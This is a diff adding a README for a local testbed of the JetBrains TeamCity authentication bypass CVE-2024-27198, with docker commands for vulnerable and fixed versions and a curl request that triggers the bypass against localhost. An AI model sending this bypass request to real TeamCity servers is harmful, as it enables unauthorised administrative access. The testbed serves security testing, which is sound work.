diff --git a/jetbrains/teamcity/CVE-2024-27198/README.md b/jetbrains/teamcity/CVE-2024-27198/README.md
new file mode 100644
index 00000000..f7619e83
--- /dev/null
+++ b/jetbrains/teamcity/CVE-2024-27198/README.md
@@ -0,0 +1,26 @@
+# JetBrains TeamCity CVE-2024-27198
+
+These are the deployment instructions for JetBrains TeamCity - CVE-2024-27198 testbed. Versions prior to 2023.11.4 are affected by an authentication bypass vulnerability that allows attackers to perform administrative actions.
+
+## How to Trigger the Vulnerability?
+
+To trigger the vulnerability, you can use the following curl command. Since this vulnerability is an authentication bypass vulnerability, you should see the version info (like `version="2023.11.3 (build 147512)" versionMajor="2023" versionMinor="11"`) in the response for vulnerable instances.
+
+Curl Request:
+
+```sh
+curl -v "http://localhost:8111/hax?jsp=/app/rest/server;.jsp"  -H "Accept: */*"
+```
+## Fixed version
+```sh
+docker run -it --rm --name teamcity-fixed -u root -p 8111:8111 jetbrains/teamcity-server:2023.11.4
+```
+
+The deployed service listens on `localhost:8111` after the docker completes its job. For the first time, you need to visit the `http://localhost:8111/` to setup and determine an admin account credential. Just proceeding with the default options is enough.
+
+## Vulnerable version
+```sh
+docker run -it --rm --name teamcity-vuln -u root -p 8111:8111 jetbrains/teamcity-server:2023.11.3
+```
+
+The deployed service listens on `localhost:8111` after the docker completes its job. For the first time, you need to visit the `http://localhost:8111/` to setup and determine an admin account credential. Just proceeding with the default options is enough.